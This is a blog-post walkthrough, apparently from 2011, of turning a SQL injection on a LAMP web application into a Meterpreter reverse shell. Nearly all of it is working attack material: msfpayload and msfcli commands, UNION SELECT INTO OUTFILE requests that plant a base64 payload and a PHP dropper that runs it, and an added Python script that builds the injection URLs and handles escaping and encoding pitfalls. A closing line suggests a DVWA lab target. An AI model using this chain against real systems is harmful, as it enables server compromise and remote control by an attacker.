Tuesday, June 21, 2011

Going from SQL Injection to Reverse Shell Walkthrough

So much for trying to start blogging... I started this blog a few months ago and totally forgot about it... hah! Well, here is the first real post! Enjoy!

Anyway, I was looking around the web for a good walkthrough on getting a reverse shell from a SQLi vulnerability on a LAMP system and couldn't find one (unless my google-fu sucks), so here is one I put together.  It assumes a fairly standard configuration where neither MySQL nor Apache runs as root and both have few privileges, plus the two things this technique actually needs: the database account the web app connects with has the MySQL FILE privilege (required for INTO OUTFILE, and secure_file_priv must not restrict where it may write), and the OS user MySQL runs as can write to your www directory.  Without FILE and a writable web root, step 4 below fails and you are left with plain data extraction.
  1. First you need to find your SQL injection vulnerability. :)  While you are at it, work out how many columns the original query returns, because the UNION SELECT below has to return exactly that many (pad the ones you don't use with NULL).
  2. Next, we generate our payload.  We use msfpayload for this and base64 encode it so the binary crosses the wire as printable ASCII with no bad chars.  The post encodes twice; a single pass already gives you clean characters, but the PHP dropper in step 4 decodes twice, so keep the two consistent.  Use -w0 so GNU base64 doesn't wrap the output at 76 columns, which would leave you joining lines by hand.  Change the LHOST option to match your local IP.  You can also specify a port with LPORT=<port>.
    1. # msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 X | base64 -w0 | base64 -w0
    2. You then get your base64 encoded string on a single line. Copy it.
  3. We now send it to the remote server through the SQL injection vulnerability.  The best place to create the file is the /tmp directory on the remote server, since the MySQL user can write there and the Apache user can read what it wrote.  The string is only [A-Za-z0-9+/=], so nothing in it gets mangled by INTO OUTFILE's escaping, but do URL-encode it when you send it: a raw + in a query string is decoded as a space by PHP.  Note that INTO OUTFILE refuses to overwrite, so the file must not already exist.  Use straight single quotes around the string; curly quotes from a word processor are not string delimiters to MySQL.
    1. http://www.bad.site/vulnpage.php?id=-1 UNION SELECT 'ZjBWTVJnRUJBUUFBQUFBQUFBQUFBQUlBQXdBQkFBQUFWSUFFQ0RRQUFBQUFBQUFBQUFBQUFEUUFJQUFCQUFBQUFBQUFBQUVBQUFBQQpBQUFBQUlBRUNBQ0FCQWk0QUFBQXVBQUFBQWNBQUFBQUVBQUFNZHRUUTFOcUFtcG1XSW5oellDWFcyakFxQUVVWm1nUlhHWlRpZUZxClpsaFFVVmVKNFVQTmdGdVp0Z3l3QTgyQS8rRT0K' INTO OUTFILE '/tmp/mettemp'
  4. Next we create a PHP page that base64 decodes the payload and writes a new file the Apache user can execute.  This page reads the file with the base64 encoded string we created earlier, decodes it twice, writes the result to a new file in /tmp, chmods that file so it is executable, then executes it.  Two things to watch: the PHP sits inside a single-quoted SQL string, so it must not contain a single quote (the code below uses double quotes only), and INTO OUTFILE escapes backslashes, tabs and newlines with its default ESCAPED BY, so keep the code on one line with none of those in it.  The output path has to be inside the web root and writable by the OS user MySQL runs as.  The file is opened with "w" rather than "a" so a second visit overwrites instead of appending to a half-run binary, and chmod 700 is enough because only the Apache user needs to run it.
    1. http://www.bad.site/vulnpage.php?id=-1 UNION SELECT '<?php $myfile = "/tmp/mettemp"; $myfile2 = "/tmp/metexec"; $fh = fopen($myfile, "r"); $data = fread($fh, filesize($myfile)); fclose($fh); $fh2 = fopen($myfile2, "w"); fwrite($fh2, base64_decode(base64_decode($data))); fclose($fh2); system("chmod 700 " . $myfile2); system($myfile2); echo "pwned"; ?>' INTO OUTFILE '/var/www/html/rev_shell.php'
  5. On your local system, start your handler for the reverse shell before you trigger the page, using the same payload, LHOST and LPORT you baked into the binary in step 2.
    1. # msfcli exploit/multi/handler payload=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 E
  6. Now all you need to do is browse to the rev_shell.php page you created earlier and enjoy your reverse meterpreter shell.  Don't be surprised that the browser request never finishes: PHP's system() waits for the child to exit, and the child is your payload, so that request stays open for as long as the session lives.
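
Putting steps 2 through 4 together, here is an added example script (mine, not the post's tooling) that builds the two INTO OUTFILE injections offline: it double-base64-encodes the payload without line wraps, pads the UNION to the number of columns the original query returns, checks that nothing in the content would be broken by a single quote or mangled by INTO OUTFILE's default escaping, and percent-encodes the GET value so a + in the base64 is not turned into a space.  The page URL, the parameter name, the column count and the stand-in ELF bytes are assumptions; pipe the real msfpayload output into it to get the real URLs.

```python
#!/usr/bin/env python3
"""Build the two INTO OUTFILE injections from this walkthrough offline.

Added example for this post; it is not the author's tooling. It assumes a
UNION-based injection in a GET parameter (named `id` here) whose original
query returns `ncols` columns, and it uses a constructed stand-in for the
msfpayload ELF so it runs without Metasploit or a target.
"""
import base64
import sys
from urllib.parse import quote

# Constructed stand-in for `msfpayload ... X` output (a real run reads the
# ELF bytes from that pipe); every byte value is present on purpose.
SAMPLE_ELF = b"\x7fELF" + bytes(range(256))

# With its default ESCAPED BY '\\', SELECT ... INTO OUTFILE rewrites these
# bytes (backslash, the tab field terminator, the newline line terminator,
# NUL), so anything written through it must avoid them.
OUTFILE_ESCAPED = {0x5C, 0x09, 0x0A, 0x00}

# The dropper PHP from the post: double quotes only so it can sit inside a
# single-quoted SQL string, and no backslash/tab/newline for INTO OUTFILE.
DROPPER_PHP = (
    '<?php $myfile = "/tmp/mettemp"; $myfile2 = "/tmp/metexec"; '
    '$fh = fopen($myfile, "r"); $data = fread($fh, filesize($myfile)); fclose($fh); '
    '$fh2 = fopen($myfile2, "w"); fwrite($fh2, base64_decode(base64_decode($data))); '
    'fclose($fh2); system("chmod 700 " . $myfile2); system($myfile2); echo "pwned"; ?>'
)


def encode_payload(raw: bytes) -> str:
    """`base64 -w0 | base64 -w0`: two passes, no line wraps."""
    return base64.b64encode(base64.b64encode(raw)).decode("ascii")


def decode_payload(text: str) -> bytes:
    """What the dropper does on the server: base64_decode(base64_decode($data)).
    strip() mirrors PHP's tolerance of the newline INTO OUTFILE appends."""
    return base64.b64decode(base64.b64decode(text.strip()))


def outfile_safe(content: str) -> bool:
    """True if INTO OUTFILE will write `content` byte-for-byte."""
    return not any(b in OUTFILE_ESCAPED for b in content.encode("utf-8"))


def union_outfile(content: str, path: str, ncols: int, col: int = 0) -> str:
    """-1 UNION SELECT NULL,...,'content',...,NULL INTO OUTFILE 'path'.

    The UNION has to return exactly as many columns as the original query,
    so the unused ones are padded with NULL; `col` is the one that carries
    the file contents. The content must not contain a single quote, and
    the file must not already exist on the target (INTO OUTFILE refuses
    to overwrite)."""
    if "'" in content:
        raise ValueError("single quote in content would terminate the SQL string")
    if not outfile_safe(content):
        raise ValueError("content contains bytes INTO OUTFILE would escape")
    cols = ["NULL"] * ncols
    cols[col] = "'" + content + "'"
    return f"-1 UNION SELECT {','.join(cols)} INTO OUTFILE '{path}'"


def injection_url(page: str, sql: str, param: str = "id") -> str:
    """Percent-encode everything: a raw + or space in the query string is
    decoded as a space by PHP and would corrupt the base64."""
    return f"{page}?{param}={quote(sql, safe='')}"


if __name__ == "__main__":
    # Read the real ELF from a pipe, or fall back to the constructed sample.
    elf = sys.stdin.buffer.read() if not sys.stdin.isatty() else SAMPLE_ELF
    page, ncols = "http://www.bad.site/vulnpage.php", 1  # assumed target
    print(injection_url(page, union_outfile(encode_payload(elf), "/tmp/mettemp", ncols)))
    print(injection_url(page, union_outfile(DROPPER_PHP, "/var/www/html/rev_shell.php", ncols)))
```

Run it as `msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 X | python3 build_injections.py` and request the two printed URLs in order (payload file first, then the dropper page), with the handler from step 5 already listening before you fetch rev_shell.php.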

You will only have the privileges of the Apache user (www-data or apache, depending on the distro), but from there you can continue with privilege escalation for more fun.

If you want to test this out in a lab environment, you can use the Damn Vulnerable Web App (DVWA) in the Web Security Dojo VM as the target and a BackTrack VM as the attacker.